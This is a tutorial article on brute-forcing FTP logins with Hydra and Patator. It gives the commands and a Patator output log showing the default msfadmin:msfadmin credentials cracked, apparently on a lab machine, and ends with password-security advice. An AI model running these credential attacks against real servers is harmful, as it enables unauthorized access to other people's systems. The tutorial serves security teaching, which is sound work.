How to Crack FTP Passwords?
Last Updated :
22 Jul, 2022
The primary purpose of an FTP server is to allow users to upload and download files. An FTP server is a computer that has a file transfer protocol (FTP) address and is dedicated to receiving an FTP connection. FTP is a protocol used to transfer files via the internet between a server (sender) and a client (receiver). An FTP server is a computer that offers files available for download via an FTP protocol, and it is a common solution used to facilitate remote data sharing between computers.
Method 1: Crack Using Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, FTP, HTTP, HTTPS, SMB, several databases, and much more.
Step 1: Create a Word list, two word list for cracking username and password.
Step 2: Run the following Command:
hydra -L user.txt -P pass.txt [target ip] FTP
Here, -L: denotes path for username list
-P: denotes path for the password list
Once the commands are executed, it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the FTP username as msfadmin and password is msfadmin.
Step 3: Run the following command:
hydra -h
Method Two: Crack Using Patator
Patator is a multipurpose brute-forcer. It is quite useful for making brute force attack on many ports such as FTP, HTTP, SMB etc.
Step 1: Run this Command:
patator FTP_login host=192.168.29.77
user=FILE0 0=user.txt password=FILE1 1=pass.txt
Note: FTP_login: denotes the FTP brute forcing
host= : for target ip/FTP server ip
user=FILE 0= path of wordlist for cracking username
password=FILE1 1= path of wordlist for cracking password
Output:
┌──(kali㉿DESKTOP-SK08UEQ)-
[/mnt/c/Users/RAJ/Desktop/javascript]
└─$ patator FTP_login host=192.168.29.77
user=FILE0 0=user.txt password=FILE1 1=pass.txt
23:46:17 patator INFO - Starting Patator 0.9
(https://github.com/lanjelot/patator)
with python-3.9.10 at 2022-07-08 23:46 IST
23:46:17 patator INFO -
23:46:17 patator INFO - code size time | candidate
| num | mesg
23:46:17 patator INFO - ----------------------------------
23:46:20 patator INFO - 530 16 3.058 | bjgjhg:bjgjhg
| 6 | Login incorrect.
23:46:20 patator INFO - 230 17 0.004 | msfadmin:msfadmin
| 16 | Login successful.
23:46:20 patator INFO - 530 16 3.056 | bjgjhg:fhjfh
| 7 | Login incorrect.
23:46:20 patator INFO - 530 16 3.052 | bjgjhg:msfadmin
| 8 | Login incorrect.
23:46:20 patator INFO - 530 16 3.052 | fhjfh:fdgd
| 9 | Login incorrect.
23:46:20 patator INFO - 530 16 3.049 | fhjfh:bjgjhg
| 10 | Login incorrect.
23:46:21 patator INFO - 530 16 2.853 | fdgd:fdgd
| 1 | Login incorrect.
23:46:21 patator INFO - 530 16 2.850 | fdgd:bjgjhg
| 2 | Login incorrect.
23:46:21 patator INFO - 530 16 2.858 | fdgd:fhjfh
| 3 | Login incorrect.
23:46:21 patator INFO - 530 16 2.857 | fdgd:msfadmin
| 4 | Login incorrect.
23:46:21 patator INFO - 530 16 2.863 | bjgjhg:fdgd
| 5 | Login incorrect.
23:46:24 patator INFO - 530 16 2.928 | fhjfh:fhjfh
| 11 | Login incorrect.
23:46:24 patator INFO - 530 16 2.929 | fhjfh:msfadmin
| 12 | Login incorrect.
23:46:24 patator INFO - 530 16 2.935 | msfadmin:fdgd
| 13 | Login incorrect.
23:46:24 patator INFO - 530 16 2.935 | msfadmin:bjgjhg
| 14 | Login incorrect.
23:46:24 patator INFO - 530 16 2.925 | msfadmin:fhjfh
| 15 | Login incorrect.
23:46:24 patator INFO - Hits/Done/Skip/Fail/Size:
16/16/0/0/9, Avg: 2 r/s, Time: 0h 0m 7s
Note: Here is username msfadmin
and password msfadmin is Login successfully
Conclusion:
Any password hacking attempt is successful only because of predictable password combinations. Firewalls and IPS are great when increasing the protection of your assets over the network but do not forget practices such as training employees against social engineering, using multifactor authentication, monthly password changes and random password audits across systems to ensure weak passwords are not in use.
Like Article
Suggest improvement
Share your thoughts in the comments
Please Login to comment...